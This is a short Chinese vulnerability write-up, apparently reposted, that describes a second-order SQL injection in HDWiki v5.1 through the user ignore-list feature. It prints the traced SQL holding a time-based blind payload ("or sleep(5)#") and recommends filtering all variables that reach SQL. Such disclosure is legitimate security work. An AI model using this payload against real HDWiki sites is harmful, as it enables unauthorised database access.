好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

hdwiki老版本设计缺陷存在二次注入 - 网站安全

HDWiki-v5.1GBK-20121102 设计缺陷存在二次注入

 

 

登陆用户后按照图片所示代开,在忽略列表这一块,输入的东西会第一次被记录到

 

wiki_pms表里面,然后在重复提交一次,这次提交的时候,他会从wiki_pms表里面做一个检查,后台跟踪到的sql语句为:

 

检查语句:

 

select id,new,delstatus,og from wiki_pms where toid=2 and delstatus!=2 and drafts!=1 and `from` not in ('dasd') or sleep(5)#')

 

插入语句为:

 

REPLACE INTO wiki_blacklist (uid,blacklist) VALUES('2','dasd\') or sleep(5)#')

 

 

 

然后重复提交sleep函数就开始执行

 

修复方案:

对每一次流向sql语句里面的变量都做过滤

查看更多关于hdwiki老版本设计缺陷存在二次注入 - 网站安全的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15476
  阅读:101次

上一篇: destoon /v5.0/ 存储型xss 指哪打哪(绕过2) - 网站安全

下一篇:2014年澳大利亚信息安全挑战 CySCA CTF 官方write u

相关资讯